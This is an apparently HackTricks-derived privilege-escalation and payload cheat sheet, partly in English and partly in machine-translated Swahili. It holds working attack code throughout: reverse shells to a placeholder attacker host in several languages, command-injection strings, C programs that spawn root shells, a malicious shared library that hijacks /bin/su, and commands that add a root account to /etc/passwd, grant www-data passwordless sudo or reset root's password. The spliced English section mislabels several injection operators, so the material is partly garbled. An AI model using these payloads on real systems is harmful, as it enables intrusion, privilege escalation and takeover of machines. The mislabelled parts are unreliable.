Payloads to execute

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Bash

cp /bin/bash /tmp/b && chmod +s /tmp/b
/bin/b -p #Maintains root privileges from suid, working in debian & buntu

C

Payloads to Execute

Shell

A shell payload is a command or script that is executed in a shell environment. It allows an attacker to gain remote access to a target system and execute commands.

Bash

bash -c 'command'

Python

python -c 'import os; os.system("command")'

Perl

perl -e 'system("command")'

Ruby

ruby -e 'system("command")'

PHP

php -r 'system("command");'

Node.js

node -e 'require("child_process").exec("command", function(error, stdout, stderr) { console.log(stdout); });'

Reverse Shell

A reverse shell payload is used to establish a connection from the target system to the attacker's machine. This allows the attacker to gain remote access to the target system.

Bash

bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker-ip",attacker-port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Perl

perl -e 'use Socket;$i="attacker-ip";$p=attacker-port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby

ruby -rsocket -e'f=TCPSocket.open("attacker-ip",attacker-port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PHP

php -r '$sock=fsockopen("attacker-ip",attacker-port);exec("/bin/sh -i <&3 >&3 2>&3");'

Netcat

nc -e /bin/sh attacker-ip attacker-port

Socat

socat tcp-connect:attacker-ip:attacker-port exec:/bin/sh,pty,stderr,setsid,sigint,sane

File Upload

A file upload payload is used to upload a file to a target system. This can be useful for uploading malicious files or tools to the target system.

Curl

curl -F "file=@/path/to/file" http://target-ip/upload.php

Wget

wget --post-file=/path/to/file http://target-ip/upload.php

Netcat

nc target-ip target-port < /path/to/file

SCP

scp /path/to/file user@target-ip:/path/to/destination

FTP

ftp target-ip
ftp> put /path/to/file
ftp> quit

TFTP

tftp target-ip
tftp> put /path/to/file
tftp> quit

Command Injection

A command injection payload is used to execute arbitrary commands on a target system by injecting malicious commands into vulnerable input fields.

Basic Command Injection

command; malicious-command

Command Injection with Substitution

command; $(malicious-command)

Command Injection with Encapsulation

command; `malicious-command`

Command Injection with Newline

command%0Amalicious-command

Command Injection with Pipe

command | malicious-command

Command Injection with Semicolon

command && malicious-command

Command Injection with Double Ampersand

command || malicious-command

Command Injection with Double Pipe

command |& malicious-command

Command Injection with Variable

command; echo $malicious-command

Command Injection with Subshell

command; (malicious-command)

Command Injection with Process Substitution

command; <(malicious-command)

Command Injection with Command Substitution

command; $(malicious-command)

Command Injection with Arithmetic Substitution

command; $((malicious-command))

Command Injection with Filename

command; $(cat malicious-file)

Command Injection with File Descriptor

command; cat <&3

Command Injection with Input Redirection

command; cat <<< malicious-command

Command Injection with Output Redirection

command; cat > malicious-file

Command Injection with Command Substitution and Output Redirection

command; $(malicious-command) > malicious-file

Command Injection with Command Substitution and Input Redirection

command; $(malicious-command) <<< malicious-input

Command Injection with Command Substitution and Output Redirection to File Descriptor

command; $(malicious-command) > /dev/tcp/attacker-ip/attacker-port

Command Injection with Command Substitution and Output Redirection to Reverse Shell

command; $(malicious-command) > /dev/tcp/attacker-ip/attacker-port 0<&1 2>&1
//gcc payload.c -o payload
int main(void){
setresuid(0, 0, 0); //Set as user suid user
system("/bin/sh");
return 0;
}
//gcc payload.c -o payload
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main(){
setuid(getuid());
system("/bin/bash");
return 0;
}
// Privesc to user id: 1000
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void) {
char *const paramList[10] = {"/bin/bash", "-p", NULL};
const int id = 1000;
setresuid(id, id, id);
execve(paramList[0], paramList, NULL);
return 0;
}

Kubadilisha faili ili kuongeza mamlaka

Faili za Kawaida

 • Ongeza mtumiaji na nenosiri kwenye /etc/passwd

 • Badilisha nenosiri ndani ya /etc/shadow

 • Ongeza mtumiaji kwenye sudoers kwenye /etc/sudoers

 • Tumia docker kupitia soketi ya docker, kawaida kwenye /run/docker.sock au /var/run/docker.sock

Kubadilisha maktaba

Angalia maktaba inayotumiwa na baadhi ya binary, katika kesi hii /bin/su:

ldd /bin/su
linux-vdso.so.1 (0x00007ffef06e9000)
libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)
libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)
libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)
libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)
/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)

Katika kesi hii, jaribu kujifanya kuwa /lib/x86_64-linux-gnu/libaudit.so.1. Kwa hivyo, angalia kazi za maktaba hii zinazotumiwa na binary ya su:

objdump -T /bin/su | grep audit
0000000000000000   DF *UND* 0000000000000000       audit_open
0000000000000000   DF *UND* 0000000000000000       audit_log_user_message
0000000000000000   DF *UND* 0000000000000000       audit_log_acct_message
000000000020e968 g  DO .bss  0000000000000004 Base    audit_fd

Alama za audit_open, audit_log_acct_message, audit_log_acct_message na audit_fd zinaweza kuwa kutoka kwa maktaba ya libaudit.so.1. Kwa kuwa libaudit.so.1 itafutwa na maktaba mbaya ya pamoja, alama hizi lazima ziwe zipo katika maktaba mpya ya pamoja, vinginevyo programu haitaweza kupata alama na itafunga.

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

//gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c

int audit_open;
int audit_log_acct_message;
int audit_log_user_message;
int audit_fd;

void inject()__attribute__((constructor));

void inject()
{
setuid(0);
setgid(0);
system("/bin/bash");
}

Sasa, kwa kuita /bin/su tu, utapata kikao kama mtumiaji mkuu.

Skrini

Je, unaweza kufanya mtumiaji mkuu afanye kitu?

www-data kuwa sudoers

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

Badilisha nenosiri la root

Ili kubadilisha nenosiri la root, unaweza kutumia amri ifuatayo:

sudo passwd root

Amri hii itakuruhusu kubadilisha nenosiri la mtumiaji wa root kwa mfumo wako. Unapaswa kuwa na ruhusa ya sudo ili kuweza kutumia amri hii. Baada ya kutekeleza amri, utaulizwa kuingiza nenosiri jipya la root mara mbili kwa uthibitisho. Kisha, nenosiri la root litabadilishwa na kuwa jipya.

echo "root:hacked" | chpasswd

Ongeza mtumiaji mpya wa root kwenye /etc/passwd

echo 'newrootuser:$6$SALT$ENCRYPTEDPASSWORD:0:0:root:/root:/bin/bash' >> /etc/passwd

Hii itaongeza mtumiaji mpya wa root kwenye faili ya /etc/passwd. Mtumiaji huyu atakuwa na jina la "newrootuser" na nywila iliyosimbwa itahitajika. Nywila inapaswa kusimbwa kwa kutumia salt na algorithm ya kusimbwa kama vile SHA-512. Mtumiaji huyu atakuwa na ID ya mtumiaji na ID ya kikundi cha 0, na anaweza kufikia saraka ya /root na kutumia shell ya /bin/bash.

echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Last updated